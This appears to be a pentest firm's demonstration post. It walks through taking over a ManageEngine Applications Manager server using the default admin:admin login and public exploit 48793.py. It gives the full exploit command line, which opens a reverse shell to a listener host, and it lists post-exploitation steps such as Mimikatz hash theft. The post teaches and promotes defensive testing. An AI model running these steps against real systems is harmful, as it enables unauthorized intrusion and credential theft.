In this pentest demonstration we show how easy it is to attack the Manage Engine web application, using the application’s default credentials and a remote code execution vulnerability. In minutes, we are able to obtain system-level access to the host machine. Conducting penetration tests regularly can reveal such vulnerabilities before they are exploited by troublemakers.
For this test, we are using a black box approach. We are only provided with an IP Address of 192.168.135.96 to conduct a penetration test of the target.
We begin with an Nmap scan of the target using the NmapSI4 graphical user interface (see Figure 1).
Figure 1: Nmap Scan Shows an HTTP Application Running on Port 40443. Interesting!
We could examine each open port and running service in search of an attack vector. But that would waste valuable time, which is always limited during a penetration test. Instead, we focus on the web application running on port 40443 as seen in the Nmap scan report. Navigating to the port with our web browser presents the ManageEngine Applications Manager web app, running Build No. 14700 (Figure 2).
Figure 2: Manage Engine Applications Manager Build 14700
An EDB search for this version returns an Authenticated remote code execution (RCE) vulnerability (Figure 3). Knowing that this exploit requires credentials, we run a quick online search for “manageengine default credentials” and discover that the default credentials for this application are admin:admin, which we’ll include in the get_valid_cookie section of the exploit (Figure 3).
Figure 3: Python Exploit 48793.py Affecting Build 14700
We examine the 48793.py python exploit (Figure 4). We will use python3 48793.py http://192.168.135.96:40443/j_security_check admin admin 192.168.49.135 443 to launch the exploit, but first we set up a Netcat listener to catch our command shell on the target (Figure 5).
Figure 4: Python Exploit 48793.py Exploit Database (EDB)
Figure 5: Netcat Listening on Port 443
We launch the exploit and watch our listener for the remote Windows command shell. (Figure 6)
Figure 6: We launch the exploit and wait for our shell.
The exploit runs as expected and we are presented with an NT Authority System command shell. That’s fast. We’re in. We effectively own this Windows server! See Figure 7.
Figure 7: We receive an NT Authority\system command shell in our target machine.
At this point we have a foothold to begin the post-exploitation phase. We could create a local administrator account, enable a remote desktop protocol (RDP), and visit our system with a full desktop environment in search of sensitive information. We could also import other tools such as Impacket and Mimikatz to extract credential hashes to use in pass-the-hash attacks for lateral movement.
This demonstration reveals the danger of using default credentials, even in web applications running on uncommon ports. In this case we were able to successfully exploit an authenticated remote code execution vulnerability in Manage Engine, which gave us full control of the underlying Windows OS.
Regular Penetration Testing can ensure that this and other exploitable vulnerabilities present in your current deployment are identified and mitigated or remediated as required to prevent a breach. Has anyone checked to make sure you’re not using default credentials on all your systems and applications?
